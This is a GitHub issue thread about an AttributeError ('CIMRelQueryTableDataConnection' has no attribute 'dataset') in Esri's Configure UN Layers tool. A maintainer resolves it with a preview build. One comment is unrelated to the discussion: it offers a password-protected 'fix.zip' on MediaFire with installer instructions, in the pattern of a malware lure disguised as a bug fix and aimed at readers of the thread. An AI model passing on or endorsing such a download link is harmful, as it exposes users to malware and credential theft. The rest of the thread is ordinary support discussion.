### ISSUE TITLE
Configure UN Layers tool error

### ISSUE THREAD

**Issue by gprocino** [Esri/Utility-Data-Management-Support-Tools#51]
Im using Pro 3.3.1, file geodb with un7.

If I execure "Configure UN Layers" tool with option "Rule Popup" on my map project "Map-Un" the following error appear:

﻿Traceback (most recent call last):
﻿  File "C:\ArcGIS\26_CAFC_UN\Creazione_UtilityNetwork\toolbox\UtilityDataManagementSupport_33.atbx\ConfigureUtilityNetworkLayers.tool\tool.script.execute.py", line 18, in <module>
﻿  File "C:\ArcGIS\26_CAFC_UN\Creazione_UtilityNetwork\toolbox\UtilityDataManagementSupport_33.atbx\udms\esri.py", line 404, in wrapper
﻿  File "C:\ArcGIS\26_CAFC_UN\Creazione_UtilityNetwork\toolbox\UtilityDataManagementSupport_33.atbx\udms\logic\__init__.py", line 502, in add_popups
﻿  File "C:\ArcGIS\26_CAFC_UN\Creazione_UtilityNetwork\toolbox\UtilityDataManagementSupport_33.atbx\udms\logic\popup.py", line 453, in main
﻿  File "C:\ArcGIS\26_CAFC_UN\Creazione_UtilityNetwork\toolbox\UtilityDataManagementSupport_33.atbx\udms\logic\popup.py", line 283, in _get_un_layers
﻿AttributeError: 'CIMRelQueryTableDataConnection' object has no attribute 'dataset'
***********
udms 3.3.1
﻿Traceback (most recent call last):
﻿  File "C:\ArcGIS\26_CAFC_UN\Creazione_UtilityNetwork\toolbox\UtilityDataManagementSupport_33.atbx\ConfigureUtilityNetworkLayers.tool\tool.script.execute.py", line 18, in <module>
﻿  File "C:\ArcGIS\26_CAFC_UN\Creazione_UtilityNetwork\toolbox\UtilityDataManagementSupport_33.atbx\udms\esri.py", line 404, in wrapper
﻿  File "C:\ArcGIS\26_CAFC_UN\Creazione_UtilityNetwork\toolbox\UtilityDataManagementSupport_33.atbx\udms\logic\__init__.py", line 502, in add_popups
﻿  File "C:\ArcGIS\26_CAFC_UN\Creazione_UtilityNetwork\toolbox\UtilityDataManagementSupport_33.atbx\udms\logic\popup.py", line 453, in main
﻿  File "C:\ArcGIS\26_CAFC_UN\Creazione_UtilityNetwork\toolbox\UtilityDataManagementSupport_33.atbx\udms\logic\popup.py", line 283, in _get_un_layers
﻿AttributeError: 'CIMRelQueryTableDataConnection' object has no attribute 'dataset'
Failed script Configure UN Layers...
Failed to execute (ConfigureUtilityNetworkLayers).

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MikeMillerGIS** [comment]
Can you post a screen shot of your map.  Need to figure out what layer represents a CIMRelQueryTableDataConnection.  I am guessing it is a query layer.

**Comment by MikeMillerGIS** [comment]
I added a check to that should fix it 
https://github.com/Esri/Utility-Data-Management-Support-Tools/blob/Preview3.3.2/UtilityDataManagementSupport.atbx

**Comment by gprocino** [comment]
Hi Mike thank you. It's works fine.
